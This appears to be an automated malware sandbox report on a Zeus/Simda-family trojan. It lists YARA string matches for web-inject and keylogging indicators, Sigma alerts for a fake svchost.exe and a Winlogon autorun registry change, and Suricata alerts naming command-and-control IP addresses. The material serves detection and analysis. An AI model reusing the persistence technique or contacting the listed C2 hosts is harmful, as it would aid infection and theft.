2.3.svchost.exe.2d30000.52.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.52.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.60.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
16.2.NcYLgtXIKJgHj.exe.2792000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.27.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.18.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.54.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
14.2.NcYLgtXIKJgHj.exe.2ac0000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.2.svchost.exe.29a2000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.46.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.51.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0.3.Bpfz752pYZ.exe.6f31c8.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4b3f4:$a1: name=%s&port=%u 0x4abc8:$a2: data_inject 0x4ad7c:$a3: keylog.txt 0x4aa5d:$a4: User-agent: %s]]] 0x4b544:$a5: %s\%02d.bmp
25.2.NcYLgtXIKJgHj.exe.2f50000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.9.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.2.svchost.exe.407000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.50.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.48.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.36.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
20.2.NcYLgtXIKJgHj.exe.2652000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.881000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4b3f4:$a1: name=%s&port=%u 0x4abc8:$a2: data_inject 0x4ad7c:$a3: keylog.txt 0x4aa5d:$a4: User-agent: %s]]] 0x4b544:$a5: %s\%02d.bmp
0.3.Bpfz752pYZ.exe.6f8dc8.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.2.svchost.exe.2c70000.5.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
28.2.NcYLgtXIKJgHj.exe.2eb0000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
0.3.Bpfz752pYZ.exe.6f31c8.0.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.3.Bpfz752pYZ.exe.6f31c8.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c7f4:$a1: name=%s&port=%u 0x4bfc8:$a2: data_inject 0x4c17c:$a3: keylog.txt 0x4be5d:$a4: User-agent: %s]]] 0x4c944:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.58.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.11.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.9.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
16.2.NcYLgtXIKJgHj.exe.2a60000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.886c00.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.7.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.64.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.55.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.44.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.49.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2a50000.6.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.69.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
0.3.Bpfz752pYZ.exe.6f81c8.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x477f4:$a1: name=%s&port=%u 0x46fc8:$a2: data_inject 0x4717c:$a3: keylog.txt 0x46e5d:$a4: User-agent: %s]]] 0x47944:$a5: %s\%02d.bmp
2.3.svchost.exe.ee00000.74.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.24.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
22.2.NcYLgtXIKJgHj.exe.2340000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.68.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
7.2.NcYLgtXIKJgHj.exe.3100000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
16.2.NcYLgtXIKJgHj.exe.2a60000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.60.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.68.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
36.2.NcYLgtXIKJgHj.exe.2202000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.886000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x477f4:$a1: name=%s&port=%u 0x46fc8:$a2: data_inject 0x4717c:$a3: keylog.txt 0x46e5d:$a4: User-agent: %s]]] 0x47944:$a5: %s\%02d.bmp
2.3.svchost.exe.886000.5.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x463f4:$a1: name=%s&port=%u 0x45bc8:$a2: data_inject 0x45d7c:$a3: keylog.txt 0x45a5d:$a4: User-agent: %s]]] 0x46544:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.20.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2a50000.6.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.53.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
14.2.NcYLgtXIKJgHj.exe.2922000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
7.2.NcYLgtXIKJgHj.exe.2fa2000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.66.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
34.2.NcYLgtXIKJgHj.exe.2740000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
31.2.NcYLgtXIKJgHj.exe.27f0000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.47.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.20.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.42.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
6.2.NcYLgtXIKJgHj.exe.1740000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.61.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x459f4:$a1: name=%s&port=%u 0x451c8:$a2: data_inject 0x4537c:$a3: keylog.txt 0x4505d:$a4: User-agent: %s]]] 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.886000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x463f4:$a1: name=%s&port=%u 0x45bc8:$a2: data_inject 0x45d7c:$a3: keylog.txt 0x45a5d:$a4: User-agent: %s]]] 0x46544:$a5: %s\%02d.bmp
Click to see the 222 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Bpfz752pYZ.exe, ProcessId: 1596, TargetFilename: C:\Windows\apppatch\svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bpfz752pYZ.exe", ParentImage: C:\Users\user\Desktop\Bpfz752pYZ.exe, ParentProcessId: 1596, ParentProcessName: Bpfz752pYZ.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 4888, ProcessName: svchost.exe

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 4888, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bpfz752pYZ.exe", ParentImage: C:\Users\user\Desktop\Bpfz752pYZ.exe, ParentProcessId: 1596, ParentProcessName: Bpfz752pYZ.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 4888, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bpfz752pYZ.exe", ParentImage: C:\Users\user\Desktop\Bpfz752pYZ.exe, ParentProcessId: 1596, ParentProcessName: Bpfz752pYZ.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 4888, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T18:13:14.637457+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.6	62044	TCP
2024-11-11T18:14:02.132036+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.6	56242	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T18:13:01.331145+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.6	49708	TCP
2024-11-11T18:13:01.331712+0100	2018141	1	A Network Trojan was detected	18.208.156.248	80	192.168.2.6	49711	TCP
2024-11-11T18:13:05.669775+0100	2018141	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.6	58874	TCP
2024-11-11T18:13:20.611365+0100	2018141	1	A Network Trojan was detected	52.34.198.229	80	192.168.2.6	52002	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T18:13:01.331145+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.6	49708	TCP
2024-11-11T18:13:01.331712+0100	2037771	1	A Network Trojan was detected	18.208.156.248	80	192.168.2.6	49711	TCP
2024-11-11T18:13:05.669775+0100	2037771	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.6	58874	TCP
2024-11-11T18:13:20.611365+0100	2037771	1	A Network Trojan was detected	52.34.198.229	80	192.168.2.6	52002	TCP

ET MALWARE Wapack Labs Sinkhole DNS Reply

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T18:13:00.497567+0100	2021022	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.6	64197	UDP
2024-11-11T18:13:35.488167+0100	2021022	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.6	50679	UDP
2024-11-11T18:14:52.315432+0100	2021022	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.6	53979	UDP

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T18:13:01.308489+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49710	85.17.31.82	80	TCP
2024-11-11T18:13:01.323208+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49711	18.208.156.248	80	TCP
2024-11-11T18:13:01.323321+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49708	44.221.84.105	80	TCP
2024-11-11T18:13:01.341864+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:01.347944+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49707	23.253.46.64	80	TCP
2024-11-11T18:13:01.419707+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49713	44.221.84.105	80	TCP
2024-11-11T18:13:01.449028+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:01.552615+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58860	199.59.243.227	80	TCP
2024-11-11T18:13:01.608258+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58861	99.83.170.3	80	TCP
2024-11-11T18:13:01.668891+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58862	3.94.10.34	80	TCP
2024-11-11T18:13:01.676303+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:01.724546+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58864	85.17.31.82	80	TCP
